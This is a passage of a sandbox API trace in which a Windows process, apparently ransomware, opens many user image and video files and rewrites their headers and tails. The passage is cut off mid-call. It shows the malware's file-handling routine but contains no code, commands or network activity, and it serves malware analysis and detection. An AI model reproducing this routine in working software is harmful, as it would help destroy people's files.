dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.338] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.338] ReleaseMutex (hMutex=0x168) returned 1 [0177.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rVja q1XZJsU.png", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0177.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rVja q1XZJsU.png", cchWideChar=16, lpMultiByteStr=0x1f88bcc, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rVja q1XZJsU.png", lpUsedDefaultChar=0x0) returned 16 [0177.338] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.339] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x935d [0177.339] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.339] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x935d [0177.340] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a76d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a76d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.340] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0177.340] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.340] CloseHandle (hObject=0x1d8) returned 1 [0177.340] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fFQRpDCXsB\\Yaj_IPfjT2R.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ffqrpdcxsb\\yaj_ipfjt2r.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.340] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.340] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4d8b [0177.341] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.341] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.341] ReleaseMutex (hMutex=0x168) returned 1 [0177.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yaj_IPfjT2R.png", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0177.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yaj_IPfjT2R.png", cchWideChar=15, lpMultiByteStr=0x1f7362c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Yaj_IPfjT2R.png", lpUsedDefaultChar=0x0) returned 15 [0177.341] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.342] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3d8b [0177.342] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.342] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3d8b [0177.342] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.343] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0177.343] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0177.343] CloseHandle (hObject=0x1d8) returned 1 [0177.343] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\1C9J3GuYLOaN-nXj2cv.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\1c9j3guyloan-nxj2cv.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.343] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.343] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xd376 [0177.343] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.343] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.343] ReleaseMutex (hMutex=0x168) returned 1 [0177.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1C9J3GuYLOaN-nXj2cv.swf", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0177.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1C9J3GuYLOaN-nXj2cv.swf", cchWideChar=23, lpMultiByteStr=0x1f88bcc, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1C9J3GuYLOaN-nXj2cv.swf", lpUsedDefaultChar=0x0) returned 23 [0177.344] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.345] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xc376 [0177.345] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.345] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xc376 [0177.345] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a76d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a76d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.345] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0177.345] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.346] CloseHandle (hObject=0x1d8) returned 1 [0177.346] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\EoH7mBquEvOKApaV8\\KpulTDh6gGfc6.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\eoh7mbquevokapav8\\kpultdh6ggfc6.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.346] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.346] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x8445 [0177.346] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.346] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.346] ReleaseMutex (hMutex=0x168) returned 1 [0177.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KpulTDh6gGfc6.flv", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0177.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KpulTDh6gGfc6.flv", cchWideChar=17, lpMultiByteStr=0x1f88bcc, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KpulTDh6gGfc6.flv", lpUsedDefaultChar=0x0) returned 17 [0177.347] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.348] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x7445 [0177.348] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.348] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x7445 [0177.348] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a76d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a76d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.348] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0177.348] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.348] CloseHandle (hObject=0x1d8) returned 1 [0177.349] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\_ZlYUd2JJwlU_wHf\\Gn9yrCZetE3_HdhZI.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\_zlyud2jjwlu_whf\\gn9yrczete3_hdhzi.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.349] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.349] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xe18c [0177.349] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.349] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.349] ReleaseMutex (hMutex=0x168) returned 1 [0177.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Gn9yrCZetE3_HdhZI.flv", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0177.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Gn9yrCZetE3_HdhZI.flv", cchWideChar=21, lpMultiByteStr=0x1f88bcc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Gn9yrCZetE3_HdhZI.flv", lpUsedDefaultChar=0x0) returned 21 [0177.349] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.350] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xd18c [0177.350] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.350] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xd18c [0177.351] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a76d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a76d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.351] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0177.351] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.351] CloseHandle (hObject=0x1d8) returned 1 [0177.351] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\_ZlYUd2JJwlU_wHf\\vuifTep-4o6j41\\Xb1hxk.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\_zlyud2jjwlu_whf\\vuiftep-4o6j41\\xb1hxk.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.351] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.352] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x3d53 [0177.352] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.352] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.352] ReleaseMutex (hMutex=0x168) returned 1 [0177.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Xb1hxk.mp4", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Xb1hxk.mp4", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Xb1hxk.mp4", lpUsedDefaultChar=0x0) returned 10 [0177.352] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.353] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2d53 [0177.353] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.353] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2d53 [0177.354] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0178.422] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0178.422] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0178.424] CloseHandle (hObject=0x1d8) returned 1 [0178.431] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sqbgHDamn\\Ys9vx4Ohphg7FK.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\sqbghdamn\\ys9vx4ohphg7fk.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.431] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.432] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6f85 [0178.432] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.432] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.432] ReleaseMutex (hMutex=0x168) returned 1 [0178.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ys9vx4Ohphg7FK.flv", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0178.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ys9vx4Ohphg7FK.flv", cchWideChar=18, lpMultiByteStr=0x1f88bcc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ys9vx4Ohphg7FK.flv", lpUsedDefaultChar=0x0) returned 18 [0178.432] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.434] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5f85 [0178.434] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.434] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5f85 [0178.434] WriteFile (in: hFile=0x1d8, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0178.435] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0178.435] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0178.435] CloseHandle (hObject=0x1d8) returned 1 [0178.436] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0178.436] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.436] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x365fc [0178.437] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0178.437] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.437] ReleaseMutex (hMutex=0x168) returned 1 [0178.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Help_MKWD_AssetId.H1W", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0178.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Help_MKWD_AssetId.H1W", cchWideChar=21, lpMultiByteStr=0x1f88bcc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Help_MKWD_AssetId.H1W", lpUsedDefaultChar=0x0) returned 21 [0178.437] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0178.440] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x355fc [0178.440] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.441] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x355fc [0178.442] WriteFile (in: hFile=0x1d8, 